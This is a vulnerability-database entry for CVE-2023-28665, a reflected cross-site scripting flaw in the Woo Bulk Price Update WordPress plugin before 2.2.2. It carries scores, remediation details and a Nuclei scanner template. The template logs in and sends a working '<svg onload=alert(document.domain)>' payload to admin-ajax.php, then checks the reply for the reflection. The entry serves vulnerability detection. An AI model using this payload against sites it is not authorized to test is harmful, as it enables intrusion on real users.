Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-28665
HistoryJul 16, 2023 - 6:06 p.m.

Woo Bulk Price Update <2.2.2 - Cross-Site Scripting

2023-07-1618:06:40
ProjectDiscovery
github.com
cve2023
wordpress
wp-plugin
wpscan
xss
authenticated
technocrackers
woocommerce

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

39.5%

The Woo Bulk Price Update WordPress plugin, in versions &lt; 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.
id: CVE-2023-28665

info:
  name: Woo Bulk Price Update <2.2.2 - Cross-Site Scripting
  author: Aaban SOlutions,harsh
  severity: medium
  description: |
    The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: Fixed in version 2.2.2
  reference:
    - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28665
    - https://github.com/JoshuaMart/JoshuaMart
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-28665
    cwe-id: CWE-79
    epss-score: 0.00092
    epss-percentile: 0.39168
    cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: technocrackers
    product: bulk_price_update_for_woocommerce
    framework: wordpress
  tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "<svg onload=alert(document.domain)>")'
          - 'contains(body_2, "pagination\":")'
        condition: and
# digest: 4b0a00483046022100eda48bd92500604d2c7f795dc9f29ad02cbd296ff04dd078f0ad9d0e756275d00221009f72e58aa25cb6db4550d529e6afade4404ed735bba95f58e3653646bafc1558:922c64590222798bb761d5b6d8e72950

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

39.5%

Related for NUCLEI:CVE-2023-28665